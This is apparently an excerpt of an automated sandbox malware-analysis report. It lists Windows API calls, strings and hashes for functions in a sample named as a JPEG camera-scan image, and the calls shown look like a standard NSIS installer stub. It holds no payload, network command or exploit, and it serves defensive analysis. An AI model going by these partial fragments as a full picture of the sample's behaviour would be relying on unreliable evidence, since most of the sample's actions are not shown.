Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Process$ExitFile$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
String ID: "$.tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3776617018-3048946811
Opcode ID: a91a174bc5d1d230ddfb7dff79904cc1c57bb7c02f16d3283ab930755c51460b
Instruction ID: 9e312bc3f5d3d37e61d45afab2cefd1cff230aa7333539c56d086af75f350ab7
Opcode Fuzzy Hash: a91a174bc5d1d230ddfb7dff79904cc1c57bb7c02f16d3283ab930755c51460b
Instruction Fuzzy Hash: 90C106706082426AE7216F719D4DB2B3EACEB85706F04457FF581B61E2C77C8A05CB2E

Function 00404A0E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404A26
GetDlgItem.USER32(?,00000408), ref: 00404A31
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A7B
LoadBitmapA.USER32(0000006E), ref: 00404A8E
SetWindowLongA.USER32(?,000000FC,00405005), ref: 00404AA7
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404ABB
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404ACD
SendMessageA.USER32(?,00001109,00000002), ref: 00404AE3
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404AEF
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404B01
DeleteObject.GDI32(00000000), ref: 00404B04
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 00404B2F
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 00404B3B
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404BD0
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404BFB
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404C0F
GetWindowLongA.USER32(?,000000F0), ref: 00404C3E
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404C4C
ShowWindow.USER32(?,00000005), ref: 00404C5D
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404D5A
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404DBF
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404DD4
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404DF8
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404E18
ImageList_Destroy.COMCTL32(?), ref: 00404E2D
GlobalFree.KERNEL32(?), ref: 00404E3D
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404EB6
SendMessageA.USER32(?,00001102,?,?), ref: 00404F5F
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404F6E
InvalidateRect.USER32(?,00000000,00000001), ref: 00404F8E
ShowWindow.USER32(?,00000000), ref: 00404FDC
GetDlgItem.USER32(?,000003FE), ref: 00404FE7
ShowWindow.USER32(00000000), ref: 00404FEE

Strings

M, xrefs: 00404BB7
, xrefs: 00404FC6
N, xrefs: 00404C98

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 4e752241f8a22205b313c674a0fa0ac315a159478eb51d1d4232cd19beea6f76
Instruction ID: e53edbee2b152b0549b5e4175851bd50996010034005c2ce37e30fc0cedab0f1
Opcode Fuzzy Hash: 4e752241f8a22205b313c674a0fa0ac315a159478eb51d1d4232cd19beea6f76
Instruction Fuzzy Hash: A50260B0900209AFEB20DF94DC85AAE7BB5FB84315F10817AF610B62E1D7799D42DF58

Function 00405732 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159filestringCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(?,?,75953410,0042A400,00000000), ref: 0040575B
lstrcatA.KERNEL32(00420D10,\*.*,00420D10,?,?,75953410,0042A400,00000000), ref: 004057A3
lstrcatA.KERNEL32(?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057C4
lstrlenA.KERNEL32(?,?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057CA
FindFirstFileA.KERNEL32(00420D10,?,?,?,00409014,?,00420D10,?,?,75953410,0042A400,00000000), ref: 004057DB
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405888
FindClose.KERNEL32(00000000), ref: 00405899

Strings

\*.*, xrefs: 0040579D

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 2035342205-1173974218
Opcode ID: f68f1787a7535e61b3df604e6a8492ba07a213b852bbd40fa4bcb335dd7bb391
Instruction ID: 4530166bbd706fa81c440e6583376772d6fc270faa34d54a03d6882d8fc6be8c
Opcode Fuzzy Hash: f68f1787a7535e61b3df604e6a8492ba07a213b852bbd40fa4bcb335dd7bb391
Instruction Fuzzy Hash: 7351B332904A09BADB216B728C45BAF7A78DF42714F14817BF841B11D2D73C8952DEA9

Function 004065F6 Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction ID: 5cdea38fe39661480990cc8a004f6d9d9bf1a0cca829e9caf547f016d39c1b54
Opcode Fuzzy Hash: 48b772c591d60bd120ceb21c558333e6da892a782e2c7f4c33aa573d96a0a8bb
Instruction Fuzzy Hash: 7BF17475D00229CBDF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7385A86CF44

Function 004051CF Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 0040522E
GetDlgItem.USER32(?,000003EE), ref: 0040523D
GetClientRect.USER32(?,?), ref: 0040527A
GetSystemMetrics.USER32(00000002), ref: 00405281
SendMessageA.USER32(?,0000101B,00000000,?), ref: 004052A2
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004052B3
SendMessageA.USER32(?,00001001,00000000,?), ref: 004052C6
SendMessageA.USER32(?,00001026,00000000,?), ref: 004052D4
SendMessageA.USER32(?,00001024,00000000,?), ref: 004052E7
ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405309
ShowWindow.USER32(?,00000008), ref: 0040531D
GetDlgItem.USER32(?,000003EC), ref: 0040533E
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040534E
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405367
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405373
GetDlgItem.USER32(?,000003F8), ref: 0040524C

Part of subcall function 0040403E: SendMessageA.USER32(00000028,?,00000001,00403E6E), ref: 0040404C

GetDlgItem.USER32(?,000003EC), ref: 0040538F
CreateThread.KERNEL32(00000000,00000000,Function_00005163,00000000), ref: 0040539D
CloseHandle.KERNEL32(00000000), ref: 004053A4
ShowWindow.USER32(00000000), ref: 004053C7
ShowWindow.USER32(?,00000008), ref: 004053CE
ShowWindow.USER32(00000008), ref: 00405414
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405448
CreatePopupMenu.USER32 ref: 00405459
AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 0040546E
GetWindowRect.USER32(?,000000FF), ref: 0040548E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004054A7
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004054E3
OpenClipboard.USER32(00000000), ref: 004054F3
EmptyClipboard.USER32 ref: 004054F9
GlobalAlloc.KERNEL32(00000042,?), ref: 00405502
GlobalLock.KERNEL32(00000000), ref: 0040550C
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405520
GlobalUnlock.KERNEL32(00000000), ref: 00405539
SetClipboardData.USER32(00000001,00000000), ref: 00405544
CloseClipboard.USER32 ref: 0040554A

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID:
API String ID: 590372296-0
Opcode ID: 5bdd9b46476261559d6694a4cd74e20f816b77f87763010c5b76ad9fb73ac299
Instruction ID: 0e806a1c10c1a3103ec1b6ff030541c572903ae85d70ab094f2e75f2d1af7317
Opcode Fuzzy Hash: 5bdd9b46476261559d6694a4cd74e20f816b77f87763010c5b76ad9fb73ac299
Instruction Fuzzy Hash: ABA15AB1900209BFDB219FA4DD89AAE7F79FB04355F10403AFA04B62A0C7B55E41DF69

Function 00403B35 Relevance: 48.3, APIs: 32, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B71
ShowWindow.USER32(?), ref: 00403B8E
DestroyWindow.USER32 ref: 00403BA2
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BBE
GetDlgItem.USER32(?,?), ref: 00403BDF
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BF3
IsWindowEnabled.USER32(00000000), ref: 00403BFA
GetDlgItem.USER32(?,00000001), ref: 00403CA8
GetDlgItem.USER32(?,00000002), ref: 00403CB2
SetClassLongA.USER32(?,000000F2,?), ref: 00403CCC
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D1D
GetDlgItem.USER32(?,00000003), ref: 00403DC3
ShowWindow.USER32(00000000,?), ref: 00403DE4
EnableWindow.USER32(?,?), ref: 00403DF6
EnableWindow.USER32(?,?), ref: 00403E11
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E27
EnableMenuItem.USER32(00000000), ref: 00403E2E
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E46
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E59
lstrlenA.KERNEL32(0041FD08,?,0041FD08,00000000), ref: 00403E83
SetWindowTextA.USER32(?,0041FD08), ref: 00403E92
ShowWindow.USER32(?,0000000A), ref: 00403FC6

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 81c88675faf25888c04451cc2ffaec258773ee0ceb852ea8c66f1226f3afe971
Instruction ID: ece9219a4d70184b68c45d6c06b8272552e5c94251c83fd0e936414de4f8c744
Opcode Fuzzy Hash: 81c88675faf25888c04451cc2ffaec258773ee0ceb852ea8c66f1226f3afe971
Instruction Fuzzy Hash: 7AC1C0B1A04205BBDB206F61EE48E2B3E7DFB45706F40453EF601B11E1C779A9429B6E

Function 00403798 Relevance: 37.0, APIs: 13, Strings: 8, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00406302: GetModuleHandleA.KERNEL32(?,?,?,00403249,0000000A), ref: 00406314
Part of subcall function 00406302: GetProcAddress.KERNEL32(00000000,?), ref: 0040632F

lstrcatA.KERNEL32(0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410,0042A400,00429000,00000000), ref: 00403813
lstrlenA.KERNEL32(004226A0,?,?,?,004226A0,00000000,00429400,0042A000,0041FD08,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD08,00000000,00000002,75953410), ref: 00403888
lstrcmpiA.KERNEL32(?,.exe), ref: 0040389B
GetFileAttributesA.KERNEL32(004226A0), ref: 004038A6
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 004038EF

Part of subcall function 00405EC8: wsprintfA.USER32 ref: 00405ED5

RegisterClassA.USER32(00422EA0), ref: 0040392C
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403944
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403979
ShowWindow.USER32(00000005,00000000), ref: 004039AF
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039DB
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039E8
RegisterClassA.USER32(00422EA0), ref: 004039F1
DialogBoxParamA.USER32(?,00000000,00403B35,00000000), ref: 00403A10

Strings

RichEd20, xrefs: 004039B5
.exe, xrefs: 00403895
RichEdit20A, xrefs: 004039D3, 004039D9
RichEdit, xrefs: 004039E2
RichEd32, xrefs: 004039C3
_Nb, xrefs: 0040390B, 00403973
Control Panel\Desktop\ResourceLocale, xrefs: 004037CC
.DEFAULT\Control Panel\International, xrefs: 004037FE

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
API String ID: 1975747703-2904746566
Opcode ID: 6992a9b3df8017145895e51aef8ae2a8cf28360cdeb3b2749b9af584065ecc2b
Instruction ID: 22145a8d87807f1e884b2dd2f98424a05527e1b570cf61420d2a276d1199ab18
Opcode Fuzzy Hash: 6992a9b3df8017145895e51aef8ae2a8cf28360cdeb3b2749b9af584065ecc2b
Instruction Fuzzy Hash: 3B61D5B1744200BED720BF659D45F2B3AACEB4475AB40447EF941B22E2C67C9D069A2E

Function 00404174 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 202windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041FF
GetDlgItem.USER32(00000000,000003E8), ref: 00404213
SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404231
GetSysColor.USER32(?), ref: 00404242
SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404251
SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404260
lstrlenA.KERNEL32(?), ref: 00404263
SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404272
SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404287
GetDlgItem.USER32(?,0000040A), ref: 004042E9
SendMessageA.USER32(00000000), ref: 004042EC
GetDlgItem.USER32(?,000003E8), ref: 00404317
SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404357
LoadCursorA.USER32(00000000,00007F02), ref: 00404366
SetCursor.USER32(00000000), ref: 0040436F
LoadCursorA.USER32(00000000,00007F00), ref: 00404385
SetCursor.USER32(00000000), ref: 00404388
SendMessageA.USER32(00000111,00000001,00000000), ref: 004043B4
SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C8

Strings

?A@, xrefs: 00404373
N, xrefs: 00404305

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: ?A@$N
API String ID: 3103080414-3605915619
Opcode ID: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction ID: 58642e7cad261c001b024910741a92c2a1970d4d91afa6865c69404cbc82dd24
Opcode Fuzzy Hash: 073baeb7e2e56e8e61070ac22e94b8c547292f2e7e559fc5b4704c6dbdd391f8
Instruction Fuzzy Hash: F061B2B1A40209BFEB109F61DD45B6A7B69FB84715F008036FB04BA2D1C7B8A951CB99

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction ID: d756f8073455ec7f94eaaa006bac723f94b68f9cc4de0a6a70f3062e944f429a
Opcode Fuzzy Hash: 0195cc9bd3a679183555b6c9b2658d6023a39abd86bfcdd07458fb5c51006648
Instruction Fuzzy Hash: 6E419B71804249AFCF058FA4CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5

Function 00405BD9 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D6A,?,?), ref: 00405C0A
GetShortPathNameA.KERNEL32(?,00421A98,00000400), ref: 00405C13

Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A78
Part of subcall function 00405A68: lstrlenA.KERNEL32(00000000,?,00000000,00405CC3,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AAA

GetShortPathNameA.KERNEL32(?,00421E98,00000400), ref: 00405C30
wsprintfA.USER32 ref: 00405C4E
GetFileSize.KERNEL32(00000000,00000000,00421E98,C0000000,00000004,00421E98,?,?,?,?,?), ref: 00405C89
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C98
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CD0
SetFilePointer.KERNEL32(004093B8,00000000,00000000,00000000,00000000,00421698,00000000,-0000000A,004093B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D26
GlobalFree.KERNEL32(00000000), ref: 00405D37
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D3E

Part of subcall function 00405B03: GetFileAttributesA.KERNEL32(00000003,00402DA3,0042AC00,80000000,00000003), ref: 00405B07
Part of subcall function 00405B03: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B29

Strings

[Rename], xrefs: 00405CB8, 00405CCA
%s=%s, xrefs: 00405C44

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: cd0aa59a73482e16cbacdae304ee390d59bfd628383bb3a13ec19384333e6ea7
Instruction ID: 5deb0727307c374d823852481fd1d72290d2d80dc16b0ec149a77f792b4fa3ea
Opcode Fuzzy Hash: cd0aa59a73482e16cbacdae304ee390d59bfd628383bb3a13ec19384333e6ea7
Instruction Fuzzy Hash: 0F31F231605B156BD6206B659C49F6B3AACDF45754F14043BBE01FA2D2E67CAC008EBD

Function 0040449B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 274stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004044EA
SetWindowTextA.USER32(00000000,?), ref: 00404514
SHBrowseForFolderA.SHELL32(?,0041F0E0,?), ref: 004045C5
CoTaskMemFree.OLE32(00000000), ref: 004045D0
lstrcmpiA.KERNEL32(004226A0,0041FD08), ref: 00404602
lstrcatA.KERNEL32(?,004226A0), ref: 0040460E
SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404620

